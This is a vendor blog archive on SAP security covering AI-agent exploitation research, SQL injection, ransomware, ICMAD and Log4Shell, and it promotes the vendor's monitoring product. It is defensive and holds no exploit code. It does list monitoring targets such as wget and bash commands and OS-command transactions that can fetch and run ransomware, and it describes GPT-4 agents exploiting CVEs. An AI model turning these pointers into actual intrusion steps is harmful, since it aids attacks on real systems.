Layer Seven Security

Artificial Intelligence Exploits Vulnerabilities in Systems with a 87 percent Success Rate

Based on a newly-released paper published by researchers at the University of Illinois, AI agents can combine large language models with automation software to autonomously analyze and exploit security vulnerabilities. During the research, OpenAI’s GPT-4 large language model was able to successfully exploit 87 percent of vulnerabilities when provided with a CVE advisory describing the flaws. The dataset included 15 one-day vulnerabilities taken from the Common Vulnerabilities and Exposures (CVE) database. One-day vulnerabilities are vulnerabilities that have been disclosed but not patched. More than 50 percent of the dataset were critical or high-rated vulnerabilities.  Vulnerability exploitation was performed by GPT-4 using the ReAct automation framework.

Large language models are AI programs that use deep learning to recognize and interpret complex data such as human language. GPT-4 failed to exploit just two of the 15 vulnerabilities in the dataset. This included CVE-2023-51653 for Hertzbeat RCE. The cause of the failure to exploit this particular CVE was due to differences between the language available for the detailed description of the vulnerability and the language deployed for the AI agent.

Researchers calculated the cost of successful AI agent attacks at just $8.80 per exploit. The agent consists of only 91 lines of code and has not been publicly released at the request of OpenAI.

The ground-breaking research demonstrates the risk posed by AI to automate the discovery and exploitation of security vulnerabilities.  It reduces the complexity and cost of vulnerability exploitation and increases the reach of threat actors.

The details of SAP vulnerabilities are publicly available in sources such as the CVE database and the NIST National Vulnerability Database (NVD).  AI agents using large language models can analyze CVEs in the databases including details revealed in links for each CVE. SAP vulnerabilities are also documented and explained in depth in security forums. This often includes disclosure of sample code for vulnerability exploitation.

According to another recent study performed by Flashpoint and Onapsis, ransomware incidents impacting SAP systems increased by 400% over the last three years. Conversations on SAP vulnerabilities and exploits increased by 490% across the open, deep, and dark web between 2021 and 2023.

SAP customers can actively manage the risk of the successful discovery and exploitation of vulnerabilities including attacks leveraging artificial intelligence by regularly patching SAP solutions and through on-going vulnerability management. The Cybersecurity Extension for SAP automates the detection of both required SAP security notes and vulnerabilities in SAP solutions and infrastructure. It also detects vulnerabilities in custom SAP applications and programs.

FBI and CISA Issue Alert for Threat Actors Actively Exploiting SQL Injection Vulnerabilities

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) issued an alert this week to urge organizations to urgently address SQL injection vulnerabilities in software. The alert is based on recent exploits performed by the CL0P cybercrime group, also known as TA505. The Russian group has exploited SQL injection vulnerabilities to propagate ransomware that has extorted an estimated $100M from organizations.

TA505 provides Ransomware-as-a-Service (RaaS) to other threat actors, sells access to compromised corporate networks as an initial access broker, and operates botnets specializing in financial fraud. The group is actively exploiting SQL injection vulnerabilities to install web shells in compromised servers. The web shells are used to execute operating system commands, install malicious ransomware programs, and exfiltrate data. TA505 is believed to have breached 130 organizations in just 10 days.

SQL injection vulnerabilities arise when user inputs are included in SQL commands to execute database queries. The processing of database queries containing malicious commands can enable threat actors to access and modify sensitive data, change programs and system configurations, and install and execute programs such as ransomware.  

The risk of SQL injection can be mitigated using a combination of input validation and output encoding, escaping and quoting. Input validation reviews user-provided data before it is included in database queries and rejects data that does not conform with expected specifications such as character types, length, and syntax. Output encoding, escaping, and quoting can be more effective than input validation since programs often need to support free-form text containing arbitrary characters.

SAP software is subjected to static code analysis and other forms of security testing to detect and remove potential SQL injection vulnerabilities. However, SAP is not responsible for securing custom programs and applications deployed to SAP systems. Securing custom programs is the responsibility of each SAP customer. The Cybersecurity Extension for SAP is an SAP-certified addon that automatically detects SQL injection vulnerabilities in custom SAP ABAP programs and SAP UI5 applications. This includes SQL injection vulnerabilities in SELECT, INSERT, UPDATE, MODIFY, DELETE and other statements, as well as GROUP, JOIN, SET, WHERE, and other conditions and clauses. It also detects SQL injection issues in ADBC, DDL, DML and other statements executed by APIs in SAP systems.

The Cybersecurity Extension for SAP integrates with the ABAP Test Cockpit (ATC) and SAP Code Inspector (SCI). It also integrates with the Transport Management System (TMS) to automatically scan and block requests containing SQL injection and other security vulnerabilities.

Layer Seven Security Release Updated Ransomware Guide for SAP

Earlier this month, MGM Resorts reported a major cyber attack that severely disrupted its operations including online and payment processing systems. Threat actors are reported to have breached MGM’s network and systems and exfiltrated several terabytes of sensitive data. The company was forced to shut down several key systems as it worked with law enforcement agencies and cybersecurity companies to investigate and contain the breach.

MGM reported the incident in form 8-K filings required by the Securities and Exchange Commission (SEC). New SEC rules effective from September 5 require publicly listed organizations in the U.S to disclose material cybersecurity incidents within four business days.

The hacking group Scattered Spider, part of the ALPHV cyber criminal organization, has claimed responsibility for the breach. Scattered Spider is believed to have breached around 100 organizations within the last two years, mostly in the U.S and Canada. According to statements released by ALPHV, also known as BlackCat, the group was able to breach MGM by exploiting vulnerabilities in an access and identity management provider and cloud tenant. Once they gained administrative access to more than 100 ESXi hypervisors at MGM, ALPHV began deploying ransomware in the compromised systems. Ransomware is a form of malware that encrypts the file system to lock targets until a ransom is paid by the victim.

Caesars Entertainment also reported in September that it had been the victim of a successful ransomware attack that breached personally-identifiable information in it’s loyalty program database including drivers license and social security numbers. Caesars disclosed in it’s 8-K filing with the SEC that the organization paid a $15 million ransom to prevent the disclosure of the stolen data and restore access to its compromised systems.

The business impact of ransomware can be significant in terms of both direct and indirect costs and reputational harm. For example, according to the credit rating agency Moody’s, the cyberattack at MGM could negatively impact the credit rating of the company.

SAP systems are not immune to ransomware. They can be compromised through vulnerable operating systems supporting SAP solutions, insecure protocols, interfaces and cross-system interfaces, and OS commands performed through the application layer that exploit trust relationships between SAP applications and hosts. In response to the recent breaches at Caesars and MGM, Layer Seven Security has released an updated guide for securing SAP solutions from ransomware. Layer Seven Security is an industry-leader in cybersecurity services and solutions for SAP. The guide provides clear and succinct recommendations to prevent and detect ransomware attacks in SAP systems, as well as restore systems during the recovery phase. You can download the guide directly from SAPinsider by following this link.

How to Discover Actively Exploited Vulnerabilities in Your SAP Systems

SAP systems have a wide attack surface. Threat actors can enumerate and exploit multiple known vulnerabilities in SAP components and programs to compromise SAP solutions. Automated vulnerability scans often reveal hundreds of weaknesses in SAP systems. Remediating each vulnerability requires extensive planning and testing for each impacted system.  Most organizations do not have the resources to remediate every vulnerability to close all possible attack vectors in their SAP solutions. A prioritized approach focused on remediating high-risk vulnerabilities can be used to concentrate efforts. Organizations can also focus on vulnerabilities that are being actively exploited in their SAP systems. This involves correlating user and system activity captured in SAP logs with vulnerabilities that have been identified in systems.

This correlation is performed automatically by the Cybersecurity Extension for SAP (CES). CES is an addon for SAP Solution Manager and SAP Focused Run. CES will also be available as an extension for SAP Cloud ALM in 2024.

CES performs daily automated scans to detect over 4000 vulnerabilities in SAP applications and supporting databases and operating systems. The vulnerabilities are analyzed and managed using the Vulnerability Management application in CES. The application displays a summary of vulnerability scan results when accessed. Users can switch between the system card view and the dashboard view in the summary.

System Card View:

Dashboard View:

Users can select one or more system from the Summary to drilldown to the findings.

The Overview section displays the open vulnerabilities for the selected systems. Results can be filtered and sorted by area, environment, rating and other variables.

Responsibility for remediating vulnerabilities can be assigned to specific owners and assignees directly in the Overview. Target dates can also be maintained for the removal of the root causes of issues. Remediation plans can be maintained in the Action Plan tab in the detailed display for each vulnerability.

Actively exploited vulnerabilities are identified and flagged based on automated and continuous correlation with event logs and alerts in CES. Results can be filtered to focus on vulnerabilities that have active alerts. Users can also create and publish alarms to their Launchpads for actively exploited vulnerabilities using the Save as Tile option.

In the example below, there is an open alert for the successful call of a vulnerable ICF service in a system. Although the vulnerability is rated as medium-risk, the active exploitation of the vulnerability in the system indicates that the finding should be prioritized for remediation.

The alert for the vulnerability can be analyzed by clicking on the alert icon for the vulnerability. This directs to the details of the alert in the Security Alerts application in CES.

The automated discovery and reporting of actively exploited vulnerabilities is supported in version 5.0 and higher of the Cybersecurity Extension for SAP.

Cybersecurity Threats to SAP Systems Report

Earlier this month, SAPinsider released the 2023 Cybersecurity Threats to SAP Systems Report. Co-sponsored by Layer Seven Security, the report is based on the findings of a survey of more than 205 security professionals in North America, EMEA, APJ, and LATAM, representing SAP customers across nine industries.

The report revealed several trends in 2023 compared to reports for earlier years. Similar to 2022, respondents ranked unpatched systems, ransomware attacks, and credentials compromise as the most significant threats to SAP systems. The exploitation of system interfaces and weak access controls were also identified as important but less significant threats.

Patching and updating SAP systems and enforcing secure password policies were reported as the most important requirements for SAP cybersecurity. Protecting SAP systems from zero-days threats was also identified as an important requirement, even though there is no evidence of the successful exploitation of any zero-day vulnerability for SAP solutions.

This article provides practical recommendations for managing the top five threats to SAP systems presented in the report. The recommendations can be implemented using a combination of the Cybersecurity Extension for SAP and SAP ALM platforms such as Solution Manager, Focused Run, and Cloud ALM. According to the report, 81% of customers are using one or more of these platforms. However, less than half of SAP customers are fully leveraging the capabilities of their ALM investments.

Security Patching

Keeping up with patches is the most significant cybersecurity challenge reported by SAP customers. This is due to reasons such as the volume of patches, difficulties with prioritizing notes and scheduling system downtimes, the reluctance to apply notes that could impact system availability, and issues validating whether patches are correctly implemented. The last is especially challenging for notes with manual corrections.

System Recommendations (SysRec) in SAP Solution Manager automates the discovery and implementation of security notes for SAP solutions. It calculates relevant notes based on the installed software components and versions in systems. Notes can be filtered by priority to focus on hot news and high priority patches. SysRec also identifies objects impacted by security notes and provides usage counts for the objects. This can be used to develop targeted test plans based on the known impact of security notes. Notes impacting unused objects can be implemented with minimal testing.

Automated corrections can be downloaded through SysRec and staged in systems for implementation. Once implemented successfully, the relevant notes are automatically removed from the SysRec results. The implementation status of notes with manual corrections can be maintained using the Status option. False positives in SysRec can occur if notes are released by SAP without software component information. The Cybersecurity Extension for SAP (CES) automatically discovers and removes the false positives to improve the quality and reliability of notes reported by SysRec.


Ransomware can target SAP applications through multiple a­ttack vectors. Unauthorized external program starts through the gateway server should be restricted using the secinfo access control list. Authorizations for OS commands should be restricted. This includes authorizations for RSBDCOS0, SM49 and CG3Z which can be used to download, install and run ransomware tools. Custom ABAP, UI5, Java and SQLScript programs may be exploited to perform arbitrary OS commands. Vulnerable programs can be discovered using code vulnerability scanning solutions. Vulnerable ICF services such as SOAP RFC and WEB RFC should be disabled. The SAP Virus Scan Interface should be enabled to support the detection of malware in file uploads and the propagation of ransomware through file downloads.

Ransomware can also target hosts supporting SAP applications. Therefore, it is important to secure and monitor the operating system layer in SAP systems. Unnecessary ports and services should be closed. Root commands and sudo actions should be closely monitored, particularly wget and bash commands, and the creation and execution of OS files.  The Cybersecurity Extension for SAP is the only security solution that protects and detects against ransomware across application, database and OS layers in SAP systems.

Credentials Compromise

Transport layer security using SNC and SSL for SAP protocols will protect encoded SAP passwords in client-server and server-server communications. Access to password hashes in SAP tables should be restricted and monitored. Downwards-compatible passwords should be disabled since this will prevent the storage of password hashes that use vulnerable algorithms. Strong password policies should be enforced using the relevant settings in systems including login parameters in ABAP systems. Session management should be enabled and logon tickets and cookies should be secured against misuse. Detection and alerting for SAP accounts that may have been compromised can be activated using Anomaly Detection in the Cybersecurity Extension for SAP. Anomaly Detection will detect for unusual user actions such logins from new terminals or IP addresses for each user and the execution of transactions and reports that are not typically accessed by users.

System Interfaces

Program starts, server registrations, and monitor commands should be restricted for the gateway server. The use of RFC destinations with stored credentials should be restricted. The authorizations for RFC users should be provisioned based on the principle of least privilege to minimize the impact if RFC accounts are compromised. RFC user accounts should be system or communication user types, not dialog or reference. Positive whitelists are recommended to prevent the misuse of RFC callbacks. Trusted RFC connections should be used only in the required scenarios and trust relationships should not be configured from lower to higher order environments.

Unified Connectivity (UCON) should be enabled and configured to protect external calls to sensitive remote-enabled function modules (RFMs). Requests blocked by UCON are logged in the Security Audit Log.

Interface and Connection Monitoring (ICMon) in SAP Solution Manager and Integration and Exception Monitoring in SAP Focused Run can be deployed to identify critical internal and external system interfaces. This includes RFC, HTTP, Cloud, IDoc, and Web Service connections. Alerts can be configured for the usage of system interfaces outside of normal scenarios. For example, customers can enable alerting for an RFC destination if it used by a user not included in a permitted whitelist or if the destination is used to call RFMs that are not typically called by the destination. Similar alerting can be enabled for calls to applications, IDocs, cloud services and web services accessed using non-RFC protocols.

Access Controls

Access to administrative profiles, roles, authorizations and transactions should be restricted. This includes roles and permissions in SAP databases and hosts. The SAP_ALL profile should not be used in productive systems. Standard users should be locked and default passwords should be changed. Authorization checks should be enforced for all RFMs and system operations. Switchable authorization checks should be enabled wherever applicable to secure access to sensitive function modules. Conflicting functions should be assigned to separate users to enforce the segregation of duties. This includes user creation/ role maintenance, role maintenance/ role assignment, and transport creation/ transport release.

The Cybersecurity Extension for SAP can be used to discover users with administrative permissions or access to conflicting functions. It can also alert for the execution of sensitive programs, reports and transactions. Exclusions can be maintained for specific users or based on factors such as user group to support whitelisting and prevent false positives or alert flooding.

Securing Microsoft Platforms with the Cybersecurity Extension for SAP

SAP systems consist of multiple integrated technological layers. SAP solutions comprise the application layer. The application layer is supported by database and operating system layers. The layers are closely integrated to form a software ecosystem linked through several connections including trust relationships that bond the layers to form an SAP system. The layers are more tightly integrated in SAP HANA installations where application, database and OS functions can share physical resources.

Since SAP systems are comprised of multiple layers, security must be applied across all layers within a system. Threat actors can bypass secure SAP applications by targeting weaknesses at the database or OS level to compromise SAP systems. Ransomware, for example, can lead to a denial-of-service for SAP services by exploiting vulnerable operating systems. Application-level data protection mechanisms can be bypassed by exfiltrating data in SAP solutions directly from the database.

The need to secure databases and operating systems in SAP systems is more pressing when SAP applications are coupled with Microsoft platforms that are widely targeted by threat actors and suffer from a host of known vulnerabilities and exploits. The Cybersecurity Extension for SAP is the only security solution that secures all layers within SAP systems including databases and operating systems.

Together with over 2000 vulnerability checks for SAP solutions, the Cybersecurity Extension for SAP performs automated vulnerability scans for Microsoft SQL Server and Microsoft Server to detect more than 300 known security weaknesses in the platforms. This includes active vulnerable services that widen the attack surface for databases and hosts, authentication settings including password policies, file and table encryption, users with administrative privileges including system and user administration, the availability of standard users, logging and auditing, open ports and services, and host firewall settings.

The Cybersecurity Extension for SAP also monitors database and operating logs to detect indicators of compromise in Microsoft platforms and trigger alerts and email/ SMS notifications for security incidents. This includes system, role and user changes, direct access to user tables, changes to database schemas, user groups, scheduled tasks, stored procedures, passwords and firewall settings, failed logons including attempted remote logons, packets blocked by host firewalls, remote procedure calls, service activation, device and program installation, and changes to system auditing.

CISA, FBI Warn Organizations to Protect Against State-Sponsored Malware

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued a joint statement to advise organizations to prepare for increased cyber activity in the wake of the Russian invasion of Ukraine. According to the advisory, there is a risk that Russian cyber attacks will spread to government and business networks in the US and other NATO countries as a result of the growing international support for Ukraine and anticipated retaliation for sanctions imposed on Russia.

Threat actors deployed destructive malware against organizations in Ukraine in the lead up to the invasion.  This included the wipers WhisperGate and HermeticWiper, designed to permanently corrupt data in infected hosts, rendering them unbootable.  Both strains of malware masquerade as ransomware but have no decryption or data-recovery capabilities.

In response, CISA and the FBI urge all organizations to adopt a heightened posture towards cybersecurity and protecting their critical assets. Specifically, organizations are advised to secure remote access to networks, patch software to address known vulnerabilities, limit the attack surface by disabling unnecessary ports and services, and monitor, detect and respond to potential intrusions.

During this time of heightened risk, organizations can license the Cybersecurity Extension for SAP from Layer Seven Security free of charge for up to three months. According to Ian Thomson, Chief Operating Officer at Layer7, “Layer Seven Security is committed to supporting organizations protect their crucial SAP assets during this critical period. Our flagship solution the Cybersecurity Extension for SAP will be provided to customers without charge to help them secure mission-critical SAP applications and infrastructure from advanced persistent threats”.   

The Cybersecurity Extension for SAP is an SAP-Certified addon for SAP Solution Manager. It implements leading-edge vulnerability management for SAP applications, databases, hosts and components, including application gateways such as the SAProuter and Web Dispatcher. It integrates with System Recommendations for detecting and managing the lifecycle of SAP security notes. The solution identifies vulnerabilities in custom ABAP code and monitors event logs in SAP systems to detect and alert for over 600 indicators of compromise. The solution also applies advanced anomaly detection powered by SAP HANA to detect unusual system and user behavior.

Contact Layer Seven Security using the link below to discuss licensing the Cybersecurity Extension for SAP free of charge to secure your SAP applications.

Security Advisory for Critical SAP ICMAD Vulnerabilities

International threat intelligence agencies including the U.S Cybersecurity & Infrastructure Security Agency (CISA) and the Computer Emergency Response Team for the EU (CERT-EU) issued security advisories last week for critical vulnerabilities in the SAP Internet Communication Manager (ICM). The ICM supports inbound and outbound communication with SAP systems using the HTTP(S) protocol. It is a standard component of the NetWeaver Application Server ABAP and Java and the SAP Web Dispatcher.

The advisories relate to CVE-2022-22536, CVE-2022-22532 and CVE-2022-22533, labelled ICMAD (Internet Communication Manager Advanced Desync). The most critical is CVE-2022-22536: a memory corruption vulnerability that can be exploited through a single HTTP request to fully compromise SAP systems, remotely and without authentication. This impacts AS ABAP and the Web Dispatcher when they are accessed through an HTTP gateway. For AS ABAP, the gateway could be the Web Dispatcher. The vulnerability does not impact direct access to SAP application servers. CVE-2022-22532 impacts AS Java only. This vulnerability has a lower CVSS than CVE-2022-22536 due to a higher attack complexity, but ranks high in terms of impact to Confidentiality, Integrity, and Availability. CVE-2022-22533 is for a lower priority denial of service vulnerability in AS Java triggered by requests that exhaust Memory Pipes (MPI) used for communicating between the ICM and work processes in application servers.

There is evidence of active scanning for ICMAD. SAP systems exposed to the Internet are especially vulnerable. External-facing Web Dispatchers are equally vulnerable. Consequently, it is critical to apply the relevant security notes to patch SAP systems against ICMAD.

Note 3123396 patches AS ABAP and the Web Dispatcher for CVE-2022-22536. SAP Kernels and Web Dispatchers should be updated to the minimum patch levels detailed in the note. The workaround detailed in note 3137885 can be applied as a stop-gap measure if the patches cannot be implemented at short notice. For access through the Web Dispatcher, refer to 3137885 to ensure that Web Dispatcher installations meet the minimum patch level. To apply the workaround, the profile parameter wdisp/additional_conn_close should be set to TRUE. For more details, refer to note 3138881.

Note 3123427 patches AS Java for CVE-2022-22532 and CVE-2022-22533. The workaround recommended in the note can be applied using the parameter setting icm/handle_http_pipeline_requests=FALSE if support for HTTP pipeline requests is not required.

The Cybersecurity Extension for SAP discovers vulnerable ABAP, Java and Web Dispatcher installations that have not been successfully patched for ICMAD. It also identifies missing or incorrectly applied workarounds if the corrections in notes 3123396 and 3123427 have not been applied. The SAP-certified solution performs over 1800 checks for known vulnerabilities in SAP applications and components and supporting databases and operating systems.

Whitepaper: Securing SAP Solutions from Log4Shell

Log4JShell is one of the most dangerous security vulnerabilities in decades. It can be exploited remotely with minimal complexity and without authentication to execute arbitrary code that could lead to the complete compromise of vulnerable applications.

Log4Shell impacts Log4J, a widely installed open-source Java logging utility. A dangerous zero-day remote code execution vulnerability in Log4J was reported in November last year. The vulnerability was patched in December and published in the National Vulnerability Database on December 12 as CVE-2021-44228.

Log4Shell was added to the Known Exploited Vulnerabilities (KEV) Catalog by the Cybersecurity and Infrastructure Security Agency (CISA) due to evidence of widespread active exploitation of the vulnerability by multiple threat actors. This includes nation state groups originating from China, Iran, Russia and North Korea. According to some reports, threat actors are exploiting the vulnerability to deploy ransomware payloads or to gain access to target networks. The access is then brokered to other threat actors.

Log4J is bundled in multiple SAP solutions including products such as SAP HANA and SAP Process Orchestration. Download the new whitepaper from Layer Seven Security to learn to mitigate and detect Log4Shell in SAP applications. The whitepaper includes a detailed breakdown of the vulnerability, guidance for patching and securing SAP solutions, and recommendations for detecting Log4shell signatures and indicators of compromise.


Securing SAP Systems from Log4J Exploits

The Cybersecurity and Infrastructure Security Agency (CISA) has designated the recent Log4J vulnerability as one of the most serious in decades and urged organizations to immediately address the vulnerability in applications.  

Log4j is an open-source logging framework maintained by the Apache Foundation. The framework includes the API Java Naming and Directory Interface (JNDI). Strings passed through JNDI can force Log4J to query remote LDAP or other servers, download serialized Java code from the malicious servers, and execute the code during deserialization if message lookup substitution is enabled. This can lead to the complete compromise of impacted applications and systems. The remote code execution vulnerability impacts all versions of Log4J2 up to and including 2.14.1 in Java 8 or higher.

Message lookup substitution is disabled by default in Log4j 2.15.0. It has been removed altogether from 2.16.0. Therefore, customers should upgrade to the latest version of Log4J. The vulnerability is addressed by CVE-2021-44228 which has a base CVSS score of 10.0.

CISA has added CVE-2021-44228 to the Known Exploited Vulnerabilities Catalog due to evidence of widespread active exploitation of the vulnerability by multiple threat actors. This includes nation state groups originating from China, Russia, Iran, and North Korea. According to some reports, threat actors are exploiting the vulnerability to deploy ransomware payloads or to gain access to target networks. The access is then brokered to other threat actors.

Log4J is included in multiple SAP applications including SAP HANA XSA. The central note 3131047 includes available patches for impacted solutions. Refer to the SAP’s official response for details of all impacted products. Note 3129883 includes manual procedures for a workaround that will disable the loading of external code in Log4J using the J2EE Config Tool.

The Cybersecurity Extension for SAP identifies vulnerable SAP systems that have not been patched for the Log4J vulnerability. It also detects and alerts for suspected exploits targeted against SAP Java and Web Dispatcher installations based on exploit signatures. This includes known obfuscations and bypass methods.